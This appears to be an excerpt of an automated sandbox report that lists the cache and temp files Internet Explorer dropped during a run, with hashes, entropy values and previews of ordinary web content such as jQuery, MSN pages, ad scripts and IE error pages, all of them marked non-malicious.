                                        Size (bytes):2313
                                        Entropy (8bit):7.594679301225926
                                        Encrypted:false
                                        SSDEEP:48:5Zvh21Zt5SkY33fS+PuSsgSrrVi7X3ZgMjkCqBn9VKg3dPnRd:vkrrS333q+PagKk7X3ZgaI9kMpRd
                                        MD5:59DAB7927838DE6A39856EED1495701B
                                        SHA1:A80734C857BFF8FF159C1879A041C6EA2329A1FA
                                        SHA-256:544BA9B5585B12B62B01C095633EFC953A7732A29CB1E941FDE5AD62AD462D57
                                        SHA-512:7D3FB1A5CC782E3C5047A6C5F14BF26DD39B8974962550193464B84A9B83B4C42FB38B19BD0CEF8247B78E3674F0C26F499DAFCF9AF780710221259D2625DB86
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BBVuddh[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):316
                                        Entropy (8bit):6.917866057386609
                                        Encrypted:false
                                        SSDEEP:6:6v/lhPahmxj1eqc1Q1rHZI8lsCkp3yBPn3OhM8TD+8lzjpxVYSmO23KuZDp:6v/7j1Q1Q1ZI8lsfp36+hBTD+8pjpxy/
                                        MD5:636BACD8AA35BA805314755511D4CE04
                                        SHA1:9BB424A02481910CE3EE30ABDA54304D90D51CA9
                                        SHA-256:157ED39615FC4B4BDB7E0D2CC541B3E0813A9C539D6615DB97420105AA6658E3
                                        SHA-512:7E5F09D34EFBFCB331EE1ED201E2DB4E1B00FD11FC43BCB987107C08FA016FD7944341A994AA6918A650CEAFE13644F827C46E403F1F5D83B6820755BF1A4C13
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BBXXVfm[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):842
                                        Entropy (8bit):7.712790381238881
                                        Encrypted:false
                                        SSDEEP:24:03eeNY8QugsamcgusRa+4Sm81pdhTaXHir8L:0fNY8QuosS+4SmetsL
                                        MD5:4F44C5854D2A321DE38DDA7580D99D2A
                                        SHA1:637217CD4AB94060B945D364D6AD80BB173F41B7
                                        SHA-256:77E9AF4EF4CEC6BAE0181D3173577BE0488DE8DB5FA71D2E5C7E05B5D5D27565
                                        SHA-512:AC46863DDFE68156E7D76DDE08C299459B8C01CD8B2DB9DB5C3A4434D5CF34F6162556A29EBBCA401810ED5AD5F9BE57090E819DDED688EE7C36D179A1FBF3F6
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\cf0f64e7-0354-429d-b700-c0cb0384258a[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, frames 3
                                        Category:dropped
                                        Size (bytes):87750
                                        Entropy (8bit):7.971920862407236
                                        Encrypted:false
                                        SSDEEP:1536:rV71v5me8Il0WbASXD+HpcgZz9UoN2VXWmWZ8kiTbL/AR9v2jpW4JgJs:Z71RJl0WhXDEA5WTZt/MpTOu
                                        MD5:C664CC3A06C7E91256C992E6DBC7F38C
                                        SHA1:68D9D406B5536B88D3DE4B339E9E53FD546572B4
                                        SHA-256:8812FF9A4A6A6D35408460D10BF89FAC4BCB7DC44EDEA5067013789F544458F2
                                        SHA-512:00D7320664B6C0786534AF7E4D709926E1CC8627A6AFA6063A67234F4616B77F8F1460C6214B5B22C5CD1442C5B69705A18E7B0D8F82E3B0BB9A4DEE6943966C
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\checksync[2].htm
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:HTML document, ASCII text, with very long lines
                                        Category:dropped
                                        Size (bytes):21628
                                        Entropy (8bit):5.304819777739522
                                        Encrypted:false
                                        SSDEEP:384:3OAGcVXlblcqnzleZSweg2f5ng+7naMHF3OZOfQWwY4RXrqt:I86qhbS2RpF3OsfQWwY4RXrqt
                                        MD5:DDD356C3D15DF3F06EF6772D05ED53D7
                                        SHA1:4A34AC5B1AD6F7B7A960AA55405625CD60BF4FE6
                                        SHA-256:62812A69A8398073B8F53B582C04B6FD214D07146A580035611F646E74922398
                                        SHA-512:9C8C6264D621A6D2EEA15B1BB627D221ABA1CB367030137B00B440E50CB1641B623C6A7E0C49220D2B35AAE93D1DEA4E819046982808BE596CAB7619E947D473
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":80,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0},"ttd":{"name":"ttd","cookie":"data-ttd","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\de-ch[1].htm
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                        Category:dropped
                                        Size (bytes):404344
                                        Entropy (8bit):5.44290331784383
                                        Encrypted:false
                                        SSDEEP:3072:6JdNJUexx+FAkJ8dZcaI0vr6emugk7FpbT0Aa52RlLMmLQmkL7IOLh:6JLlOFzV95cJaIE
                                        MD5:FF671B77977C87CC9E1258453D6E1773
                                        SHA1:B5290E931D06B0D205A76D53CD6C7FC268A693B9
                                        SHA-256:11E3DEE4719EF666D914621B7966E278F960833E5638F4AFD654D2840066B674
                                        SHA-512:28AF025B04E7475CC50FD229AB4B3BDCFF174127389AF4E51D7A9416BC0E4662F3B3A1F73660AD89BB76861EE4E4C9489F6D5FB1B8A71F728513B7E8283F2405
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: <!DOCTYPE html><html prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" lang="de-CH" class="hiperf" dir="ltr" >.. <head data-info="v:20210909_23937236;a:f874d046-3d1c-4bd8-a6f0-98442a1996cd;cn:19;az:{did:951b20c4cd6d42d29795c846b4755d88, rid: 19, sn: neurope-prod-hp, dt: 2021-09-02T18:03:34.1645487Z, bt: 2021-09-09T00:14:30.9925819Z};ddpi:1;dpio:;dpi:1;dg:tmx.pc.ms.ie10plus;th:start;PageName:startPage;m:de-ch;cb:;l:de-ch;mu:de-ch;ud:{cid:,vk:homepage,n:,l:de-ch,ck:};xd:BBqgbZW;ovc:f;al:;fxd:f;xdpub:2021-08-11 10:21:32Z;xdmap:2021-09-10 09:33:17Z;axd:;f:gholdout;userOptOut:false;userOptOutOptions:" data-js="{&quot;dpi&quot;:1.0,&quot;ddpi&quot;:1.0,&quot;dpio&quot;:null,&quot;forcedpi&quot;:null,&quot;dms&quot;:6000,&quot;ps&quot;:1000,&quot;bds&quot;:7,&quot;dg&quot;:&quot;tmx.pc.ms.ie10plus&quot;,&quot;ssl&quot;:true,&quot;moduleapi&quot;:&quot;https://www.msn.com/de-ch/homepage/api/modules/fetch&quot;,&quot;cdnmoduleapi&quot;:&quot;https://static-global-s-msn-com.akamaiz
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\dnserror[1]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2997
                                        Entropy (8bit):4.4885437940628465
                                        Encrypted:false
                                        SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                                        MD5:2DC61EB461DA1436F5D22BCE51425660
                                        SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                                        SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                                        SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\dnserror[2]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2997
                                        Entropy (8bit):4.4885437940628465
                                        Encrypted:false
                                        SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                                        MD5:2DC61EB461DA1436F5D22BCE51425660
                                        SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                                        SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                                        SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\down[1]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                        Category:dropped
                                        Size (bytes):748
                                        Entropy (8bit):7.249606135668305
                                        Encrypted:false
                                        SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                        MD5:C4F558C4C8B56858F15C09037CD6625A
                                        SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                        SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                        SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\errorPageStrings[1]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4720
                                        Entropy (8bit):5.164796203267696
                                        Encrypted:false
                                        SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                        MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                        SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                        SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                        SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\httpErrorPagesScripts[1]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):12105
                                        Entropy (8bit):5.451485481468043
                                        Encrypted:false
                                        SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                        MD5:9234071287E637F85D721463C488704C
                                        SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                        SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                        SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\jquery-2.1.1.min[1].js
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):84249
                                        Entropy (8bit):5.369991369254365
                                        Encrypted:false
                                        SSDEEP:1536:DPEkjP+iADIOr/NEe876nmBu3HvF38NdTuJO1z6/A4TqAub0R4ULvguEhjzXpa9r:oNM2Jiz6oAFKP5a98HrY
                                        MD5:9A094379D98C6458D480AD5A51C4AA27
                                        SHA1:3FE9D8ACAAEC99FC8A3F0E90ED66D5057DA2DE4E
                                        SHA-256:B2CE8462D173FC92B60F98701F45443710E423AF1B11525A762008FF2C1A0204
                                        SHA-512:4BBB1CCB1C9712ACE14220D79A16CAD01B56A4175A0DD837A90CA4D6EC262EBF0FC20E6FA1E19DB593F3D593DDD90CFDFFE492EF17A356A1756F27F90376B650
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: /*! jQuery v2.1.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */..!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.1",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,funct
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\medianet[1].htm
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:HTML document, ASCII text, with very long lines
                                        Category:dropped
                                        Size (bytes):400969
                                        Entropy (8bit):5.488041062363434
                                        Encrypted:false
                                        SSDEEP:6144:zFDkYqP1vG2jnmuynGJ8nKM03VCuPbrErMrSN9Gm9:A1vFjKnGJ8KMGxT2M+fGm9
                                        MD5:EDE6C188F1260DF0DFDBED997026B418
                                        SHA1:52B34915371CFA021FA9E2FE4E83AE54A921FB00
                                        SHA-256:938AB8528BC6C4B73CDA41E4812874BBD71D713171F9AF19E898E402919C63DA
                                        SHA-512:D2FB4D6242330C2D343B5BAA67314C7FF1A80A5AFD32AE851E0AB30EF6412D87ADC8B842BF8F6F71EAC14820765180F42E31C3F2B34011724ED45CCFF6C220FD
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: <html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs||{},window.mnjs.ERP=window.mnjs.ERP||function(){"use strict";for(var l="",s="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function d(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(a=0;a<3;a++)e+=g[a].length;if(0!==e){for(var n,r=new Image,o=f.lurl||"https://lg3-a.akamaihd.net/nerrping.php",t="",i=0,a=2;0<=a;a--){for(e=g[a].length,0;0<e;){if(n=1===a?g[a][0]:{logLevel:g[a][0].logLevel,errorVal:{name:g[a][0].errorVal.name,type:l,svr:s,servname:c,errId:g[a][0].errId,message:g[a][0].errorVal.message,line:g[a][0].errorVal.lineNumber,description:g[a][0].errorVal.description,stack:g[a][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON||"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\medianet[2].htm
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:HTML document, ASCII text, with very long lines
                                        Category:dropped
                                        Size (bytes):400969
                                        Entropy (8bit):5.4880634953561565
                                        Encrypted:false
                                        SSDEEP:6144:zFOkYqP1vG2jnmuynGJ8nKM03VCuPbTErMrSN9Gm9:N1vFjKnGJ8KMGxTuM+fGm9
                                        MD5:880384B9AD307949754F258E8704F224
                                        SHA1:F1DC854A93FDA0E015DDD4E0B03A3276AFF6E27C
                                        SHA-256:3A6CD79D964329F560119A4B8FA37C3E501FF4D2CA014DC119416812051C3FCF
                                        SHA-512:23BC937B1A9F2F1235B61BE55399A95BD0F5DCC46EDE26E0F9BB0F511F7A478E808EA24B92B17B7ABDB34060C042CA62F726E172E56CB872D97BFDED3D19982F
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: <html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs||{},window.mnjs.ERP=window.mnjs.ERP||function(){"use strict";for(var l="",s="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function d(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(a=0;a<3;a++)e+=g[a].length;if(0!==e){for(var n,r=new Image,o=f.lurl||"https://lg3-a.akamaihd.net/nerrping.php",t="",i=0,a=2;0<=a;a--){for(e=g[a].length,0;0<e;){if(n=1===a?g[a][0]:{logLevel:g[a][0].logLevel,errorVal:{name:g[a][0].errorVal.name,type:l,svr:s,servname:c,errId:g[a][0].errId,message:g[a][0].errorVal.message,line:g[a][0].errorVal.lineNumber,description:g[a][0].errorVal.description,stack:g[a][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON||"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\otSDKStub[1].js
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):16853
                                        Entropy (8bit):5.393243893610489
                                        Encrypted:false
                                        SSDEEP:192:2Qp/7PwSgaXIXbci91iEBadZH8fKR9OcmIQMYOYS7uzdwnBZv7iIHXF2FsT:FRr14FLMdZH8f4wOjawnTvuIHVh
                                        MD5:82566994A83436F3BDD00843109068A7
                                        SHA1:6D28B53651DA278FAE9CFBCEE1B93506A4BCD4A4
                                        SHA-256:450CFBC8F3F760485FBF12B16C2E4E1E9617F5A22354337968DD661D11FFAD1D
                                        SHA-512:1513DCF79F9CD8318109BDFD8BE1AEA4D2AEB4B9C869DAFF135173CC1C4C552C4C50C494088B0CA04B6FB6C208AA323BFE89E9B9DED57083F0E8954970EF8F22
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: var OneTrustStub=function(e){"use strict";var t,o,n,i,a,r,s,l,c,p,u,d,m,h,f,g,b,A,C,v,y,I,S,w,T,L,R,B,D,G,E,P,_,U,k,O,F,V,x,N,H,M,j,K=new function(){this.optanonCookieName="OptanonConsent",this.optanonHtmlGroupData=[],this.optanonHostData=[],this.genVendorsData=[],this.IABCookieValue="",this.oneTrustIABCookieName="eupubconsent",this.oneTrustIsIABCrossConsentEnableParam="isIABGlobal",this.isStubReady=!0,this.geolocationCookiesParam="geolocation",this.EUCOUNTRIES=["BE","BG","CZ","DK","DE","EE","IE","GR","ES","FR","IT","CY","LV","LT","LU","HU","MT","NL","AT","PL","PT","RO","SI","SK","FI","SE","GB","HR","LI","NO","IS"],this.stubFileName="otSDKStub",this.DATAFILEATTRIBUTE="data-domain-script",this.bannerScriptName="otBannerSdk.js",this.mobileOnlineURL=[],this.isMigratedURL=!1,this.migratedCCTID="[[OldCCTID]]",this.migratedDomainId="[[NewDomainId]]",this.userLocation={country:"",state:""}};(o=t=t||{})[o.Unknown=0]="Unknown",o[o.BannerCloseButton=1]="BannerCloseButton",o[o.ConfirmChoiceButton
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\wMhAw[1].avi
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):5
                                        Entropy (8bit):2.321928094887362
                                        Encrypted:false
                                        SSDEEP:3:3:3
                                        MD5:5BFA51F3A417B98E7443ECA90FC94703
                                        SHA1:8C015D80B8A23F780BDD215DC842B0F5551F63BD
                                        SHA-256:BEBE2853A3485D1C2E5C5BE4249183E0DDAFF9F87DE71652371700A89D937128
                                        SHA-512:4CD03686254BB28754CBAA635AE1264723E2BE80CE1DD0F78D1AB7AEE72232F5B285F79E488E9C5C49FF343015BD07BB8433D6CEE08AE3CEA8C317303E3AC399
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: 0....
                                        C:\Users\user\AppData\Local\Temp\~DF2473ADA049D0983B.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):29989
                                        Entropy (8bit):0.33062985337619266
                                        Encrypted:false
                                        SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwR9lwqc9l2X/9l2v9lN:kBqoxKAuvScS+CkX+iLy
                                        MD5:B6EAE7264912F91A920678372D4B86C8
                                        SHA1:BC81404D5089115FC02C3C4D7EC10AADDD2F8557
                                        SHA-256:06208136441667CDE91AB72BBF8575B474E3F8C188985F0B9B2F00B035FA1C67
                                        SHA-512:773626AD3B0C7B87FAE45DEC96F9B62C98A2F6ED7703A08424A0961F34A54B4C72F7E7956033A33A13B83300DEC582BCFD5AD9E796BDBD2C4C965B156BDCF144
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Temp\~DF4176C87FB657A5E6.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):39665
                                        Entropy (8bit):0.5780444584163847
                                        Encrypted:false
                                        SSDEEP:48:kBqoxKAuvScS+1bZIkIkO+7+xoVKmQM+7+xoVKmQc+7+xoVKmQ9:kBqoxKAuvScS+1bZILBGVKwGVKAGVKx
                                        MD5:B3CF81D3D0D000CA9F8F53891A15C827
                                        SHA1:10389D32A8D4D8BFAACA26DE554E39313776EFF6
                                        SHA-256:801EEA6D01716283CC38C3D219BE5EF6DC81A6526027C167293B435AA49B04A8
                                        SHA-512:5339CB9D29AD5409842E0F4D877EE7587B0059177EFA6AD7B964BD6F3B506396FEA1101FEFA9FC1EEE0EC8D3CD31253FC8622DF11F5EA59989FE39F4B888F890
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Temp\~DF4ACD897789E720BD.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):39705
                                        Entropy (8bit):0.5861883369520423
                                        Encrypted:false
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Temp\~DF4F22D68D37B8EF2E.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):25657
                                        Entropy (8bit):0.3131619969134488
                                        Encrypted:false
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Temp\~DF5B77DC3D36D1F7D9.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):39681
                                        Entropy (8bit):0.5818270151590758
                                        Encrypted:false
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Temp\~DF6901BC534DA07F79.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):39713
                                        Entropy (8bit):0.5875651256677357
                                        Encrypted:false
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Temp\~DF6E4FBFF28570096B.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):25657
                                        Entropy (8bit):0.31410335955707785
                                        Encrypted:false
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Temp\~DF7CE8F48B4B5CE347.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):34825
                                        Entropy (8bit):0.43446532092598117
                                        Encrypted:false
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Temp\~DF89E94B88C3122357.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):39673
                                        Entropy (8bit):0.5799935740111964
                                        Encrypted:false
                                        Malicious:false
